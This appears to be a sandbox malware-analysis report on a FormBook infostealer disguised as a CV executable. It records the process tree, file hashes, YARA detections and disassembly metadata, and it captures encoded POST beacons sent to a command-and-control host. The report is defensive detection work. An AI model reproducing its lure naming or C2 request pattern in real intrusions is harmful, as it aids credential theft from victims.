                                  May 27, 2024 12:37:21.735198975 CEST | 224 | IN
                                  Data Ascii: <img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>botcsllc.com</h1><h2>has expired.</h2><div class='cta'><a class='b
                                  May 27, 2024 12:37:21.735208988 CEST | 1236 | IN
                                  Data Ascii: tn' href='https://www.hover.com/renew/domain/botcsllc.com?source=expired'>Renew now</a></div><p class='note'>If you know the owner of this domain, please let them know.</p><form action='https://www.hover.com/domains/results' method='get'>
                                  May 27, 2024 12:37:21.735266924 CEST | 1236 | IN
                                  Data Ascii: follow" href="https://help.hover.com/home?source=expired">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=expired">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://ww
                                  May 27, 2024 12:37:21.735285044 CEST | 1236 | IN
                                  Data Ascii: 23 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0
                                  May 27, 2024 12:37:21.735296965 CEST | 1236 | IN
                                  Data Ascii: 5zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t9
                                  May 27, 2024 12:37:21.735306978 CEST | 206 | IN
                                  Data Ascii: tNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-45', 'auto'); ga('send', 'pageview');</script></body></html>0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  53 | 192.168.2.7 | 49764 | 152.32.189.143 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:27.283700943 CEST | 748 | OUT | POST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=bxLw68Em0SlCmu4NWTKeEud53rFFUyCMJVEmG54gXefH2bdCHrSmQgsgX36lzJYU2XIhpEK92wFMEPEOQQhrq6HDrXpIAUCNldoq/ZkLkEOZBarVAZXJ1Fi1nFYGkOJ5LeapFvK676+r0M8lDSgR3cofWKXyxoZUTHLCzPa8oqXkKeHamq0MuZVyDYN8TN+2bLzgmV5hJMRF3HYM4w==
                                  May 27, 2024 12:37:28.150044918 CEST | 551 | IN | HTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:28 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  54 | 192.168.2.7 | 49765 | 152.32.189.143 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:29.823894978 CEST | 768 | OUT | POST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=bxLw68Em0SlCmOINUwieMud+pbFFNCCIJVYmG8UWXs7H27tCGqSmTgsgcX6a+pYD2XVepF292wBMEO0OXjZorqGl+HpKP0CNldoq/dElkEWZAqbVPYXK4li2kFYGgOJHLeafFqry75Kr0I4lDDgS5sojSKWQx6Qaa1/Mw5SUppnBLoa48I4gwItJHapKErjDZK34r3NAW70v6V5IuEJgG9wreKYupBqYSMMs3m0=
                                  May 27, 2024 12:37:30.691446066 CEST | 550 | IN | HTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:30 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  55 | 192.168.2.7 | 49766 | 152.32.189.143 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:32.352309942 CEST | 1781 | OUT | POST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:33.251585960 CEST | 550 | IN | HTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:33 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                  56 | 192.168.2.7 | 49767 | 152.32.189.143 | 80
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:35.713799953 CEST | 487 | OUT | GET /wy0r/?4h=WzjQ5Lku/CcVmfYMLh2se4NW5p5EcwqyA3YiOMIwT77nsakaLKShRywTCni07+Ypglha0We7/XFNEOgzZwpW0Iau+HgTJhKyqKoR5usZjmbjCMnZJqH26R2XpANM+dd2J9nsS8vZ76/r&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:36.612344980 CEST | 564 | IN | HTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:36 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 286
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Data Ascii: <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Mon May 27 18:37:36 HKT 2024</div><div>There was an unexpected error (type=Not Found, status=404).</div><div></div></body></html>


                                  Target ID: 0
                                  Start time: 06:33:24
                                  Start date: 27/05/2024
                                  Path: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                                  Wow64 process (32bit): true
                                  Commandline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
                                  Imagebase: 0xa10000
                                  File size: 734'720 bytes
                                  MD5 hash: 1F690A7D24C0C325D681DB7D114520D4
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: low
                                  Has exited: true

                                  Target ID: 2
                                  Start time: 06:33:25
                                  Start date: 27/05/2024
                                  Path: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                                  Wow64 process (32bit): true
                                  Commandline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
                                  Imagebase: 0xa20000
                                  File size: 734'720 bytes
                                  MD5 hash: 1F690A7D24C0C325D681DB7D114520D4
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:14
                                  Start time:06:33:44
                                  Start date:27/05/2024
                                  Path:C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe"
                                  Imagebase:0xb20000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:15
                                  Start time:06:33:46
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\TSTheme.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\TSTheme.exe"
                                  Imagebase:0x350000
                                  File size:56'320 bytes
                                  MD5 hash:6634A157115551E6DDDFB4748C0565FB
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  Target ID:16
                                  Start time:08:31:33
                                  Start date:27/05/2024
                                  Path:C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe"
                                  Imagebase:0xb20000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:18
                                  Start time:08:31:45
                                  Start date:27/05/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff722870000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:11.3%
                                    Dynamic/Decrypted Code Coverage:98.9%
                                    Signature Coverage:0%
                                    Total number of Nodes:285
                                    Total number of Limit Nodes:12

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $!$)$6$:$>$>$>$S$S$T$T$X$Z$Z$]$o${${$|$|
                                    • API String ID: 0-439525591
                                    • Opcode ID: e5a2cc2edf8e9e43f34ce9942e641383890ddda79c1bedc9b5a3dba8eb34e748
                                    • Instruction ID: 334a4dcf1963e8dac9ec7f512d7f82aeab8bc54d38489b8351472bcaa88641b3
                                    • Opcode Fuzzy Hash: e5a2cc2edf8e9e43f34ce9942e641383890ddda79c1bedc9b5a3dba8eb34e748
                                    • Instruction Fuzzy Hash: 2333F934A00614CFCB65DF34C894B9AB7F2BF89304F5185A9E54AAB361DB35AE85CF40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$$q$5$z-,
                                    • API String ID: 0-3437111781
                                    • Opcode ID: 296974b0b81dd0bdca11b593ae38a595e03f082f362581098aac66d7ad93b656
                                    • Instruction ID: 210e30d7e077bb362473ee0c1031c45246c1560851a502906edfbeb21addfcec
                                    • Opcode Fuzzy Hash: 296974b0b81dd0bdca11b593ae38a595e03f082f362581098aac66d7ad93b656
                                    • Instruction Fuzzy Hash: 841213B4E15218CFEB14CFA9D9947DDBBB2BF89301F10946AD40ABB294DB349981CF14

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$LRq$\sq
                                    • API String ID: 0-3677092283
                                    • Opcode ID: cf72d995a0a5067144987d725ead8f7def3761134e826f17f182365865f56659
                                    • Instruction ID: 6e6bb5acfad956bd1fa920d9cb08a5fe6f83c058c984a0022ed847e55403c33d
                                    • Opcode Fuzzy Hash: cf72d995a0a5067144987d725ead8f7def3761134e826f17f182365865f56659
                                    • Instruction Fuzzy Hash: 16828D75E006298FCB14CF69D885AADBBF2FF88300F15C669E419EB345D734A946CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$5$z-,
                                    • API String ID: 0-1338410118
                                    • Opcode ID: 38de786e4e23b2367340f708f8681eaa4f882be096cac1fe772e2de042f267f3
                                    • Instruction ID: 7049cb533bd43c48da56ad8338d582097c81647e523ca4845445420e9f20fec1
                                    • Opcode Fuzzy Hash: 38de786e4e23b2367340f708f8681eaa4f882be096cac1fe772e2de042f267f3
                                    • Instruction Fuzzy Hash: 6002F2B4E05218CFEB14CFA9D9957DDBBB2BF89301F10946AD40ABB294DB349981CF14

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$$q$$q
                                    • API String ID: 0-3067366958
                                    • Opcode ID: fc85e6ec2bb7d625572324ab3a22857de46e2e9c8fa691c6e4048a3964ba88a1
                                    • Instruction ID: 0c07bd4302bb46fb28cfe9b1a66cc7b88759866b5fe9aa5ff6a53214f7c52de2
                                    • Opcode Fuzzy Hash: fc85e6ec2bb7d625572324ab3a22857de46e2e9c8fa691c6e4048a3964ba88a1
                                    • Instruction Fuzzy Hash: C581B074E05318CFEB64DFA5D954B9DBBB2BB89301F1081AAD40AAB355DB345E81CF10

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$\sq
                                    • API String ID: 0-576302416
                                    • Opcode ID: b947eee76279bd11ca8765949d99059edb1d1edb2ea123e0f4837be879c03117
                                    • Instruction ID: b31ac62ed08b30e18871284393346b20e54b588734c43f74daae09ddbf313c29
                                    • Opcode Fuzzy Hash: b947eee76279bd11ca8765949d99059edb1d1edb2ea123e0f4837be879c03117
                                    • Instruction Fuzzy Hash: 42D18D75E412298FDB14DF79D884AAEBBF2BFC8300F558569D405EB354DB30AA058B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$\sq
                                    • API String ID: 0-576302416
                                    • Opcode ID: fc79b6ec4adc07c82dc39bca6b0c4e0fb25351328d874627ae2d2f8bd778dfb5
                                    • Instruction ID: 64e5233a9d2042f731c21df35771b1b59281ffc3df59043972ccc333aee08e98
                                    • Opcode Fuzzy Hash: fc79b6ec4adc07c82dc39bca6b0c4e0fb25351328d874627ae2d2f8bd778dfb5
                                    • Instruction Fuzzy Hash: 3CC18D75E412298FDB14DF79D884AAEB7F2BFC8300F558569E406EB345DB30AA05CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: UJ$yO6
                                    • API String ID: 0-870398751
                                    • Opcode ID: c6249657f2c34e4c48a4ca3b083dc87ffd8e0034c5f9a42803aa7564887cf624
                                    • Instruction ID: 078c4d2ec5786d0627121bf5f5774999e48eb63c99e353dff72cc9bcf21f5123
                                    • Opcode Fuzzy Hash: c6249657f2c34e4c48a4ca3b083dc87ffd8e0034c5f9a42803aa7564887cf624
                                    • Instruction Fuzzy Hash: 8EB136B0E14219DFDB18CFA6D9805DEFBB2FF89314F14952AD016AB224EB349916CF40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !>c8$%)Y
                                    • API String ID: 0-2922296349
                                    • Opcode ID: b69fa3649700987e279cf9d103d40c9030af194c8b9afae7eee8fed1eed7228e
                                    • Instruction ID: 6491d63922753ec2c8fa65afe3cbc7ecd3ea66df75877e6a45ef0455c1c88c83
                                    • Opcode Fuzzy Hash: b69fa3649700987e279cf9d103d40c9030af194c8b9afae7eee8fed1eed7228e
                                    • Instruction Fuzzy Hash: 4F9134B1D14209EFDB08CFE6E5818DEFBB2BF89311F14942AE015AB224E7318952CF41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \sq
                                    • API String ID: 0-1116441132
                                    • Opcode ID: 77c022ffbde6cd9d74f659d874de080c957b3ca9d662405cbbfee47dd8d0a0c0
                                    • Instruction ID: 412a452c7114aa29f1a13edf51af5d55a14b1ba92d23a722a1162d2057ec5715
                                    • Opcode Fuzzy Hash: 77c022ffbde6cd9d74f659d874de080c957b3ca9d662405cbbfee47dd8d0a0c0
                                    • Instruction Fuzzy Hash: 578109B8E4010E9FDF14CFAAD485ABDBBB1BF88304F10A659D412EB250DB359A45CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 1efc3f24de93929c1c6b58f8132805ad2280efdb10da650722a9591c8a2e1d17
                                    • Instruction ID: 8c2991601e4e42eb74d2bb8b5ae26a06203a8ab2decaedb4d3c181b45718b962
                                    • Opcode Fuzzy Hash: 1efc3f24de93929c1c6b58f8132805ad2280efdb10da650722a9591c8a2e1d17
                                    • Instruction Fuzzy Hash: 50519071B001158FCB14DF69D8846AEBBF2FFC8215B558679E609CB784DB31EC428B90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q
                                    • API String ID: 0-1301096350
                                    • Opcode ID: 7c8ceaf5d49dced48055903f41ecb40a9850e639f3ba07e099cd9ae2422e0c8f
                                    • Instruction ID: 15c0d7ba2fe740c54165760294e92112b1ea70f9019749b9f2f2eeec3c5eea9d
                                    • Opcode Fuzzy Hash: 7c8ceaf5d49dced48055903f41ecb40a9850e639f3ba07e099cd9ae2422e0c8f
                                    • Instruction Fuzzy Hash: 4F710374E05218CFEB24DFA4D954B9DBBB2FB88301F1085AAD40ABB394DB349981CF54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q
                                    • API String ID: 0-1301096350
                                    • Opcode ID: 6a5e2a2924dbacd27b60d7f4d293817b4fc7a25630bfe3c98f94c19cf60ac6ee
                                    • Instruction ID: e07218ad69a01b1170e4691f66542e09fca79e680fb08b0e18fc0c9437cec45b
                                    • Opcode Fuzzy Hash: 6a5e2a2924dbacd27b60d7f4d293817b4fc7a25630bfe3c98f94c19cf60ac6ee
                                    • Instruction Fuzzy Hash: 1371E374E05258CFEB64DFA4D954B9DBBB2FB88301F1085AAD40AAB394DB349981CF14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9a886dd0caf0729c4c51b4c3263c64d17acea757918c7b213abb550bc3aef91
                                    • Instruction ID: b48e56bd6c8b29d51ab8cf1b2901121907ddb3487171ced420b4348a3b2b03ff
                                    • Opcode Fuzzy Hash: e9a886dd0caf0729c4c51b4c3263c64d17acea757918c7b213abb550bc3aef91
                                    • Instruction Fuzzy Hash: AB813872F106249FD714DB69D884B6EB7A3AFC8710F1A8165E509EB359DE74EC028B80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 064240d051f0b57b8507eb54c58670042a66970582f005a265dbf5f36c3089b9
                                    • Instruction ID: 10e294fd6d0f6aaadcdb7f9c13097c1613dc0f70a6c628f9b474b744acafc3da
                                    • Opcode Fuzzy Hash: 064240d051f0b57b8507eb54c58670042a66970582f005a265dbf5f36c3089b9
                                    • Instruction Fuzzy Hash: 6C612E72F206249FD754DB69CC84B5EB7E3AFC8710F1A8165E4099B35ADE74EC028B80

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID: W
                                    • API String ID: 716092398-655174618
                                    • Opcode ID: 02763853e4129d0240d54bedabcbbc5e760643d4da409d111d82468429899d5d
